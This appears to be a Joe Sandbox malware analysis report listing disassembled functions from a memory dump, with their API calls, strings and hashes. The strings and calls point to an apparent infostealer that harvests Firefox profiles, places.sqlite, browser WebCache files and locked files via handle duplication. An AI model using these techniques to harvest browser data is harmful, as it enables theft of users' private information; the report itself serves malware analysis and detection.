                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                      • API String ID: 3510742995-2641926074
                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                      Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                      • memset.MSVCRT ref: 004033B7
                      • memcpy.MSVCRT ref: 004033D0
                      • wcscmp.MSVCRT ref: 004033FC
                      • _wcsicmp.MSVCRT ref: 00403439
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                      • String ID: $0.@
                      • API String ID: 3030842498-1896041820
                      • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                      Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 2941347001-0
                      • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                      • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                      Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00403C09
                      • memset.MSVCRT ref: 00403C1E
                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                      • wcscat.MSVCRT ref: 00403C47
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • wcscat.MSVCRT ref: 00403C70
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memsetwcscat$Closewcscpywcslen
                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                      • API String ID: 3249829328-1174173950
                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                      Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040A824
                      • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • wcscpy.MSVCRT ref: 0040A854
                      • wcscat.MSVCRT ref: 0040A86A
                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 669240632-0
                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                      Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                      Download Yara Rule
                      APIs
                      • wcschr.MSVCRT ref: 00414458
                      • _snwprintf.MSVCRT ref: 0041447D
                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                      • String ID: "%s"
                      • API String ID: 1343145685-3297466227
                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                      Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProcProcessTimes
                      • String ID: GetProcessTimes$kernel32.dll
                      • API String ID: 1714573020-3385500049
                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                      Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 004087D6
                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                      • memset.MSVCRT ref: 00408828
                      • memset.MSVCRT ref: 00408840
                      • memset.MSVCRT ref: 00408858
                      • memset.MSVCRT ref: 00408870
                      • memset.MSVCRT ref: 00408888
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                      • String ID:
                      • API String ID: 2911713577-0
                      • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                      • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                      Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcmp
                      • String ID: @ $SQLite format 3
                      • API String ID: 1475443563-3708268960
                      • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                      • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                      Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                      • memset.MSVCRT ref: 00414C87
                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                      Strings
                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressCloseProcVersionmemsetwcscpy
                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                      • API String ID: 2705122986-2036018995
                      • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                      • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                      Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _wcsicmpqsort
                      • String ID: /nosort$/sort
                      • API String ID: 1579243037-1578091866
                      • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                      • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                      Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040E60F
                      • memset.MSVCRT ref: 0040E629
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Strings
                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                      • API String ID: 3354267031-2114579845
                      • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                      • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                      Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                      Download Yara Rule
                      APIs
                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                      • LockResource.KERNEL32(00000000), ref: 004148EF
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Resource$FindLoadLockSizeof
                      • String ID:
                      • API String ID: 3473537107-0
                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                      Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: only a single result allowed for a SELECT that is part of an expression
                      • API String ID: 2221118986-1725073988
                      • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                      • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                      Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                      Download Yara Rule
                      APIs
                      • Sleep.KERNEL32(00000064), ref: 004175D0
                      • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ChangeCloseFindNotificationSleep
                      • String ID: }A
                      • API String ID: 1821831730-2138825249
                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                      Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@DeleteObject
                      • String ID: r!A
                      • API String ID: 1103273653-628097481
                      • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                      • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                      Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@
                      • String ID:
                      • API String ID: 1033339047-0
                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                      Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                      • memcmp.MSVCRT ref: 00444BA5
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$memcmp
                      • String ID: $$8
                      • API String ID: 2808797137-435121686
                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                      Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                        • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                      • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                        • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                        • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                      • String ID:
                      • API String ID: 1042154641-0
                      • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                      • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                      Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                      • memset.MSVCRT ref: 00403A55
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                      • String ID: history.dat$places.sqlite
                      • API String ID: 3093078384-467022611
                      • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                      • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                      Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                      • GetLastError.KERNEL32 ref: 00417627
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ErrorLast$File$PointerRead
                      • String ID:
                      • API String ID: 839530781-0
